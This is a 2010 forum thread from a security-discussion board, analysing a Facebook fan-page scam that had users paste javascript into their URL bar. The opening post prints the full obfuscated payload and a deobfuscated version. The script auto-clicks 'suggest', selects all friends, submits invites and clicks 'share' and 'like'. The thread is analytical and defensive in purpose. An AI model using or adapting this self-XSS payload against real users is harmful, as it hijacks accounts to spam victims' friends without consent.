Facebook JS Injection

Discuss the many weaknesses of browser security and ways to mitigate the threat

Facebook JS Injection

Post by secdef9 on Fri Jul 09, 2010 12:43 am
([msg=41479]see Facebook JS Injection[/msg])

So the other day on Facebook I stumbled upon a fanpage, similar to those ones where you have to "Like" the page before you can view some image/video whatever. Except this one interestingly required that users copy and paste some junk into their URL bar. That junk turned out to be the following:

Code: Select all
javascript:(function(){a='app107489592636080_qjPdbG';b='app107489592636080_asAbCy';hWBkWd='app107489592636080_hWBkWd';RsApSf='app107489592636080_RsApSf';CXyYOD='app107489592636080_CXyYOD';var _0xa049=["\x76\x69\x73\x69\x62\x69\x6C\x69\x74\x79","\x73\x74\x79\x6C\x65","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x68\x69\x64\x64\x65\x6E","\x69\x6E\x6E\x65\x72\x48\x54\x4D\x4C","\x76\x61\x6C\x75\x65","\x63\x6C\x69\x63\x6B","\x73\x75\x67\x67\x65\x73\x74","\x73\x65\x6C\x65\x63\x74\x5F\x61\x6C\x6C","\x73\x67\x6D\x5F\x69\x6E\x76\x69\x74\x65\x5F\x66\x6F\x72\x6D","\x2F\x61\x6A\x61\x78\x2F\x73\x6F\x63\x69\x61\x6C\x5F\x67\x72\x61\x70\x68\x2F\x69\x6E\x76\x69\x74\x65\x5F\x64\x69\x61\x6C\x6F\x67\x2E\x70\x68\x70","\x73\x75\x62\x6D\x69\x74\x44\x69\x61\x6C\x6F\x67","\x73\x6C\x69\x6E\x6B","\x69\x6E\x70\x75\x74","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x53\x68\x61\x72\x65","\x6C\x69\x6B\x65\x6D\x65"];d=document;d[_0xa049[2]](CXyYOD)[_0xa049[1]][_0xa049[0]]=_0xa049[3];d[_0xa049[2]](a)[_0xa049[4]]=d[_0xa049[2]](b)[_0xa049[5]];d[_0xa049[2]](_0xa049[7])[_0xa049[6]]();setTimeout(function (){fs[_0xa049[8]]();} ,5000);setTimeout(function (){SocialGraphManager[_0xa049[11]](_0xa049[9],_0xa049[10]);setTimeout(function (){d[_0xa049[2]](_0xa049[12])[_0xa049[6]]();setTimeout(function (){inp=document[_0xa049[14]](_0xa049[13]);for(i in inp){if(inp[i][_0xa049[5]]==_0xa049[15]){inp[i][_0xa049[6]]();} ;} ;setTimeout(function (){d[_0xa049[2]](_0xa049[16])[_0xa049[6]]();d[_0xa049[2]](RsApSf)[_0xa049[4]]=d[_0xa049[2]](hWBkWd)[_0xa049[5]];} ,5000);} ,3000);} ,3000);} ,5000);})();





Obfuscated Javascript injection. So I whipped up a simple app to translate the hexcode; there was still a lot of obfuscation involving arrays and whatnot. After sorting through all of that, I got the following:

Code: Select all

javascript
:(



function()
{

    document[getElementById](app107489592636080_ERqmQz)[style][visibility]=hidden;

    document[getElementById](app107489592636080_pxnzBW)[innerHTML]=document[getElementById](app107489592636080_FqafMk)[value];

    document[getElementById](suggest)[click]();

    setTimeout
    (
        function ()
        {
            fs[select_all]();
        }

    ,5000
    );

    setTimeout
    (
        function ()
        {
            SocialGraphManager[submitDialog](sgm_invite_form,/ajax/social_graph/invite_dialog.php);
            setTimeout
            (
                function ()
                {
                    document[getElementById](slink)[click]();
                    setTimeout
                    (
                        function ()
                        {
                            inp=document[getElementsByTagName](input);
                            for(i in inp)
                            {
                                if(  inp[i][value]==share  )
                                {
                                    inp[i][click]();
                                }
                            ;}

                            ;
                            setTimeout
                            (
                                function ()
                                {
                                    document[getElementById](likeme)[click]();
                                    document[getElementById](app107489592636080_tsypQz)[innerHTML]=document[getElementById](app107489592636080_AKgead)[value];}
                                ,5000
                            );
                  }

                        ,3000
                    );
                }

            ,3000
            );
        }
    ,5000
    );
}



)();







My preliminary guess is that this is just a simple injection that causes users to "Like" the page and "Suggest" it to friends. I'm not particularly familiar with the exact constructs that Facebook uses (referring to the "app107489592636080_pxnzBW" garbage and whatnot), so if anyone wants to clarify exactly what this code does that would be cool.

Does anyone have any thoughts on this? The page has since been deleted but it had nearly 600,000 fans. I'm personally thinking that this code could easily be modified to send user's cookies to a remote server that would then hijack the user's session ( There is at least one tool available for this purpose, found here. ). If that's the case, does anyone else think this would be worthy of Facebook addressing? I know GMail sessions used to be easily hijacked, and I'm pretty sure Google fixed that by adding some form of server-side IP address verification.

My main concern is that nearly 600K people were fooled into injecting javascript into their own browsers.


EDIT: I looked at this some more. Turns out you couldn't use JS to capture the necessary cookies to hijack a FB session on most browsers, thanks to FB's use of the HttpOnly flag. But still.
Last edited by secdef9 on Wed Jul 14, 2010 1:57 am, edited 1 time in total.
User avatar
secdef9
New User
New User
 
Posts: 9
Joined: Sat Jan 31, 2009 12:45 pm
Blog: View Blog (0)


Re: Facebook JS Injection

Post by TheNightFox on Fri Jul 09, 2010 1:12 am
([msg=41480]see Re: Facebook JS Injection[/msg])

Yeah, I've seen a few pages like this, fooling people into using a javascript injection. People are just stupid, that's all.
He alone, who owns the youth, gains the future.
TheNightFox
New User
New User
 
Posts: 33
Joined: Thu Jan 21, 2010 12:22 pm
Blog: View Blog (0)


Re: Facebook JS Injection

Post by sanddbox on Fri Jul 09, 2010 2:03 am
([msg=41481]see Re: Facebook JS Injection[/msg])

I often see pages that will have javascript to paste into the URL that will select all of your friends and all you have to do is click "invite". I get so much annoying spam because people are so stupid.
Image

HTS User Composition:
95% Male
4.98% Female
.01% Monica
.01% Goat
User avatar
sanddbox
Expert
Expert
 
Posts: 2337
Joined: Sat Jul 04, 2009 5:20 pm
Blog: View Blog (0)


Re: Facebook JS Injection

Post by madenchina21 on Tue Jul 13, 2010 3:27 pm
([msg=41736]see Re: Facebook JS Injection[/msg])

Yeah, a lot of pages are starting to do this and its really annoying, basically what it is doing is opening the suggest to friends link, selecting the "select all" button, and then submitting and adding info to you're browser telling them that you have completed the process. And like secdef9 said, people are being dumb and just doing this all willy nilly and not knowing what they are doing and its really annoying.
User avatar
madenchina21
New User
New User
 
Posts: 2
Joined: Tue Jul 06, 2010 3:53 pm
Blog: View Blog (0)


Re: Facebook JS Injection

Post by msbachman on Tue Jul 13, 2010 4:56 pm
([msg=41745]see Re: Facebook JS Injection[/msg])

Or those scams like

CLICK HERE TO SEE A KID SHOT ON GOOGLE MAPS!!!!!!!!?!?!?!?!?!??!?!??!..........but first, you have to click here to invite all your friends!!!??!!?!?!??!?!?


That's a good litmus test to know which of your friends are morons and which aren't.
"I'm going to get into your sister. I'm going to get my hands on your daughter."
~Gatito
User avatar
msbachman
Contributor
Contributor
 
Posts: 685
Joined: Mon Jan 12, 2009 10:22 pm
Location: In the sky lol
Blog: View Blog (0)


Re: Facebook JS Injection

Post by 0xBEEF1337 on Wed Jul 14, 2010 9:00 pm
([msg=41832]see Re: Facebook JS Injection[/msg])

Delete.
0xBEEF1337
Experienced User
Experienced User
 
Posts: 75
Joined: Wed Jul 07, 2010 11:34 pm
Blog: View Blog (0)



Return to Web

Who is online

Users browsing this forum: No registered users and 0 guests